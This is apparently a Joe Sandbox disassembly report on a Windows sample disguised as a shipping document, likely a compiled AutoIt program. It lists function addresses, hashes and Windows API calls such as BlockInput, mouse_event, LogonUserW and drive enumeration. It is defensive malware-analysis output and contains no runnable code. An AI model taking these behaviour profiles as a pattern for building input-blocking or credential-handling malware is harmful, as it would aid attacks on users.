Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: c0c3dc04e4a2027f71a334767e6c8d27ed49819632f1cc68adc2a5cc10a2e625
Instruction ID: 4ed5d4eb6bd745d301edcc5b98ab4b5966ca977f8d233c925de9daf49a18647c
Opcode Fuzzy Hash: c0c3dc04e4a2027f71a334767e6c8d27ed49819632f1cc68adc2a5cc10a2e625
Instruction Fuzzy Hash: 21217276634510CBC729CF29C881BA2B7E5EB95310B248E7DE4E5CB2C0CB78B905DB58

Function 006D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 006D6ACA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c6586f6669dda996d7e8740be812d7390604d5f21af1e0f7e95e1689af4efcf6
Instruction ID: da2f8e605c89eb56e6d0767cbf160e3ee927acae2e0e86dc757b40c6b6fd3928
Opcode Fuzzy Hash: c6586f6669dda996d7e8740be812d7390604d5f21af1e0f7e95e1689af4efcf6
Instruction Fuzzy Hash: 24E01235600204AFC740EB99D414996B7EDAF64751F05C41AF946D7391DAB0E8048BA0

Function 006C74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006C750A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: d9add730aa2449780a0b5c9e62bbb31a0deb0f5cdb214b40df23da05ab539e65
Instruction ID: 0a24bac691785decc5e0f80f6fc351654789131f26dc5ccc9a6b5ac945239e18
Opcode Fuzzy Hash: d9add730aa2449780a0b5c9e62bbb31a0deb0f5cdb214b40df23da05ab539e65
Instruction Fuzzy Hash: 7CD092A416C68579EC2D07249C1BFF71A4AF300785FD4C68DB603E92C0ACE46D06A835

Function 006BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006BAD3E), ref: 006BB124

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 3922d81601d70db484dcaaf2c277491451469110dcb177a14777773d657ab005
Instruction ID: 09534161846fd11d5ef00d76dcb286c5a6b87eee3bbd9e06929c221e39eb4838
Opcode Fuzzy Hash: 3922d81601d70db484dcaaf2c277491451469110dcb177a14777773d657ab005
Instruction Fuzzy Hash: C7D05E321A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA15C50A0C675D931AB50

Function 006FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 006FB352

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d944cc3f070f6c6ff6d18a5113c7bac22cceb86905ffba6869639447a4a1319a
Instruction ID: a11fe4c5f9483967847d07d350b64f18357645cda55af05e4f374d8634c96426
Opcode Fuzzy Hash: d944cc3f070f6c6ff6d18a5113c7bac22cceb86905ffba6869639447a4a1319a
Instruction Fuzzy Hash: 32C04CF140014DDFD751CBC0C9449EEB7BCAB04301F1041919249F1110DB749B459B76

Function 006A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 006A818F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 71841d6d3627c8a9a4da7cdb5d319b0164859c81f247cd76c2370975f5a84fb7
Instruction ID: d4ae8e844df4fbff160100063bc96e2211a26b9bd653986c21e317e711f8b7ef
Opcode Fuzzy Hash: 71841d6d3627c8a9a4da7cdb5d319b0164859c81f247cd76c2370975f5a84fb7
Instruction Fuzzy Hash: F3A0113000030CEBCF002B82EC08888BF2CEA002A0B008020F80C000208B22A8208A8A

Function 006893F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 357fbfe4e9ad9c0db49b5d713f9efb1ac1b6babf7b0652bdb1176159c53ac6cf
Instruction ID: e3b52090477a6273685a0d0443ee6ae7797bbc9d7b1c776c35722df3d099871e
Opcode Fuzzy Hash: 357fbfe4e9ad9c0db49b5d713f9efb1ac1b6babf7b0652bdb1176159c53ac6cf
Instruction Fuzzy Hash: 29128D70A00209EBDF04EFA5D991AFEB7F6FF48300F148669E406E7251EB35A911CB65

Function 0068E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a595ce95d39dc1823d7214624caf893c2c92f7548ca654fdf20b6e51c90aa8b6
Instruction ID: c90e97a2be3c6c8e0a327ec5959e6c93265e01b5d36ad20e62209230904d36d8
Opcode Fuzzy Hash: a595ce95d39dc1823d7214624caf893c2c92f7548ca654fdf20b6e51c90aa8b6
Instruction Fuzzy Hash: 9B12C474A0420ADFDB24EF54C440ABEB7F2FF14314F248269D95A9B351E736AD82CB91

Function 0068AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 91e6f4d6cf0c11a80faaad880ae62e8e770c16d71158f4bf8d664b40204e5b6d
Instruction ID: afbc21aa5c39b69552042889d0db9bd1967591e0b7b7865c98c265187b76bb10
Opcode Fuzzy Hash: 91e6f4d6cf0c11a80faaad880ae62e8e770c16d71158f4bf8d664b40204e5b6d
Instruction Fuzzy Hash: 9702C170A0010ADBDF44EF68D991ABEBBB6FF44300F10C169E906DB255EB35DA11CB95

Function 006A02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 09f657acf48715c381a911636478096354c933295996b628f26afb1aac0d22e5
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 36C1B6322051930AEF2D473984744BEFAA65E927B531A176DE4B3CB6D5EF20C924DA20

Function 006A06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 3526034846577293433caae4060844dc23a3f7786e63a255d87cea6c1f144467
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: CEC1B73220519309EF2D4639C43457FBAA65EA3BB131B176DE4B3CB6D5EF20D924DA20

Function 0069FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 26d95fc8f3fbb47e0f36bcbc3bfee2aac1cae4b2e9951e77839514a036907ecf
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 39C1943220509349DF2D4739C4744BEBAAA5EA2BB531B077DE4B3CBAD5EF20C564D620

Function 00F06DF8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: dce0ef25510626cd4de4d62a593f6481bb5de33f948cd20d9c36db233775d076
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 6F41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 00F06CE8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: d64006f6fa3c95a659775116f529f92c3d70fbc0c4a68732b94daf7fb19c53c1
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 89019278E01109EFCB44DF98C5909AEF7B5FB48310F208599E809E7341D730AE51EB80

Function 00F06C88 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: ac677992a7ea0593e51ba172be4bf670f27ffabdbe82ce9e924227d4f2b7d2ca
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 65019278E00109EFCB44DF98C5909AEF7B5FB48310F208599E809E7341D730AE51EB80

Function 00F05658 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 006DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006DA2FE
DeleteObject.GDI32(00000000), ref: 006DA310
DestroyWindow.USER32 ref: 006DA31E
GetDesktopWindow.USER32 ref: 006DA338
GetWindowRect.USER32(00000000), ref: 006DA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006DA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006DA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA4D8
GetClientRect.USER32(00000000,?), ref: 006DA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006DA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA55E
GlobalLock.KERNEL32(00000000), ref: 006DA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA576
GlobalUnlock.KERNEL32(00000000), ref: 006DA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA586
GlobalFree.KERNEL32(00000000), ref: 006DA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0070D9BC,00000000), ref: 006DA5B9
GlobalFree.KERNEL32(00000000), ref: 006DA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006DA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006DA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006DA81D

Strings

, xrefs: 006DA7A3
AutoIt v3, xrefs: 006DA4D0
static, xrefs: 006DA518, 006DA66F
DISPLAY, xrefs: 006DA680

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a4fde0c7c6a6c0aa481fe92e483f844dd23764c720045f9bc0177c3e0af8f4c0
Instruction ID: abc5fc216f77f49b3d8fbbe681a3744ae90764fe3d9c18ee0291459c25ce7bcf
Opcode Fuzzy Hash: a4fde0c7c6a6c0aa481fe92e483f844dd23764c720045f9bc0177c3e0af8f4c0
Instruction Fuzzy Hash: 08026D75900204EFDB24DFA4CD89EAE7BBAFB49310F048259F915AB2A0DB74DD41CB64

Function 006ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 006ED2DB
GetSysColorBrush.USER32(0000000F), ref: 006ED30C
GetSysColor.USER32(0000000F), ref: 006ED318
SetBkColor.GDI32(?,000000FF), ref: 006ED332
SelectObject.GDI32(?,00000000), ref: 006ED341
InflateRect.USER32(?,000000FF,000000FF), ref: 006ED36C
GetSysColor.USER32(00000010), ref: 006ED374
CreateSolidBrush.GDI32(00000000), ref: 006ED37B
FrameRect.USER32(?,?,00000000), ref: 006ED38A
DeleteObject.GDI32(00000000), ref: 006ED391
InflateRect.USER32(?,000000FE,000000FE), ref: 006ED3DC
FillRect.USER32(?,?,00000000), ref: 006ED40E
GetWindowLongW.USER32(?,000000F0), ref: 006ED439

Part of subcall function 006ED575: GetSysColor.USER32(00000012), ref: 006ED5AE
Part of subcall function 006ED575: SetTextColor.GDI32(?,?), ref: 006ED5B2
Part of subcall function 006ED575: GetSysColorBrush.USER32(0000000F), ref: 006ED5C8
Part of subcall function 006ED575: GetSysColor.USER32(0000000F), ref: 006ED5D3
Part of subcall function 006ED575: GetSysColor.USER32(00000011), ref: 006ED5F0
Part of subcall function 006ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006ED5FE
Part of subcall function 006ED575: SelectObject.GDI32(?,00000000), ref: 006ED60F
Part of subcall function 006ED575: SetBkColor.GDI32(?,00000000), ref: 006ED618
Part of subcall function 006ED575: SelectObject.GDI32(?,?), ref: 006ED625
Part of subcall function 006ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 006ED644
Part of subcall function 006ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006ED65B
Part of subcall function 006ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 006ED670
Part of subcall function 006ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006ED698

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 694dc89b1813e032fc90a98157d7b413e24f34f676418737845e5395628917ba
Instruction ID: a9ffbef00d9a77061a6aaa2fc88eacf3e4d4b560bd68dc732a63077d2f0d76a2
Opcode Fuzzy Hash: 694dc89b1813e032fc90a98157d7b413e24f34f676418737845e5395628917ba
Instruction Fuzzy Hash: 0B919E71009305FFCB209FA4DC08A6B7BAAFB89325F108B19F962961E0DB75DD44CB56

Function 006CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006CDBD6
GetDriveTypeW.KERNEL32(?,0071DC54,?,\\.\,0071DC00), ref: 006CDCC3
SetErrorMode.KERNEL32(00000000,0071DC54,?,\\.\,0071DC00), ref: 006CDE29

Strings

ATAPI, xrefs: 006CDD9A
SATA, xrefs: 006CDDD9
SCSI, xrefs: 006CDD93
CDROM, xrefs: 006CDCF7
Fixed, xrefs: 006CDD0B
RAID, xrefs: 006CDDC4
SAS, xrefs: 006CDDD2
1394, xrefs: 006CDDA8
iSCSI, xrefs: 006CDDCB
MMC, xrefs: 006CDDE7
ATA, xrefs: 006CDDA1
Removable, xrefs: 006CDD15
USB, xrefs: 006CDDBD
Virtual, xrefs: 006CDDEE
\\.\, xrefs: 006CDC2B
Unknown, xrefs: 006CDCE3, 006CDD8C
FileBackedVirtual, xrefs: 006CDDF5
SSD, xrefs: 006CDD50
PhysicalDrive, xrefs: 006CDC67
Fibre, xrefs: 006CDDB6
RAMDisk, xrefs: 006CDCED
Network, xrefs: 006CDD01
SSA, xrefs: 006CDDAF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 834f4e547c6f97e321afe3e6f95cbe61bb39effe128ed7bfcf1756e50c871aab
Instruction ID: ed88e9c9528c822a83bb9bac1470f27645be1ade313a9d655a183f7faab7d07f
Opcode Fuzzy Hash: 834f4e547c6f97e321afe3e6f95cbe61bb39effe128ed7bfcf1756e50c871aab
Instruction Fuzzy Hash: 6F51A0B0648302ABC220EF18C882E79B7A3FF94745F10597EF0479B292CB74E946D756

Function 0068CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0068CC68
__wcsnicmp.LIBCMT ref: 0068CC80
__wcsnicmp.LIBCMT ref: 0068CC98
__wcsnicmp.LIBCMT ref: 0068CCB0
__wcsnicmp.LIBCMT ref: 0068CCC8
